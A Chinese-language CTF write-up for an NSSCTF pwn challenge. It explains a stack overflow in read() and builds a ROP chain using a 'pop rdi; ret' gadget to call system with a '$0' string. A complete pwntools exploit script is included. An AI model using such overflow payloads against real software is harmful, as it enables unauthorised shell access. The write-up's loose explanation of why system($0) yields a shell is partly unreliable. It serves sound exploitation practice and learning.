day5
哎呀,昨天居然忘了发了,今天先发一下吧。
shell
NSSCTF上的题,大概算是ret2text吧,关键点在于使用 system($0)
思路
有个栈不可执行保护,64位文件
逆向一下源码
溢出漏洞在read,有system函数,直接调用即可
但是没有‘/bin/sh’字符串,不过在上面名为tips的函数中发现了$0的机器码
- 热知识:使用 system(‘/bin/sh’) 和使用 system($0) 可以达到同样的效果
system($0)
和system('/bin/sh')
在功能上可以达到一致的效果。这是因为两者都会调用系统的shell来执行参数中指定的命令。具体来说,当你在代码中使用system($0)
,它会使用与运行脚本相同的shell环境来执行命令。而system('/bin/sh')
则是直接调用了/bin/sh这个程序来执行参数中的命令。所以,无论是用哪种方式,最终达到的目的都是通过shell来执行特定的命令。但需要注意的是,在某些情况下,system()
函数可能会存在执行失败的问题。
据此构建一条ROP链就行了
用ROPgadget找一下构建ROP链要用到的gadgets
ROPgadget --binary shell --only 'pop|rdi|ret'
要用gadgets片段来往system函数中传入参数(由于是64位操作系统,前六个参数放在寄存器中)
所以要用到两个片段
0x4005e3 : pop rdi ; ret
0x400416 : ret
- 一般来说这个ret会被用来阻止程序ret时传回的参数影响后续操作,但是不知道为什么这里不能使用,使用的话无法正常执获得shell。
逻辑已经梳理清楚了,下面看脚本
from pwn import *
# sh = remote('node4.anna.nssctf.cn',28800)
sh = process('./pwn')
system_addr = 0x400557
shell_addr = 0x400541
rdi_ret = 0x4005e3
ret = 0x400416 # 这个没用到,不知道为啥我用了就会出错
payload = b'a'*0x18 +p64(rdi_ret) + p64(shell_addr) + p64(system_addr)
sh.sendafter(b'find it?',payload)
sh.interactive()
反思
做这道题的时候他那个read限制读入的长度给我整麻了,虽然这里没啥影响,但是后面还是要注意一下。
我怀疑ret那句话不能加的原因就是在这里,但是我不理解因为加上那句话之后payload的长度刚好满足0x38,很明显没有超过…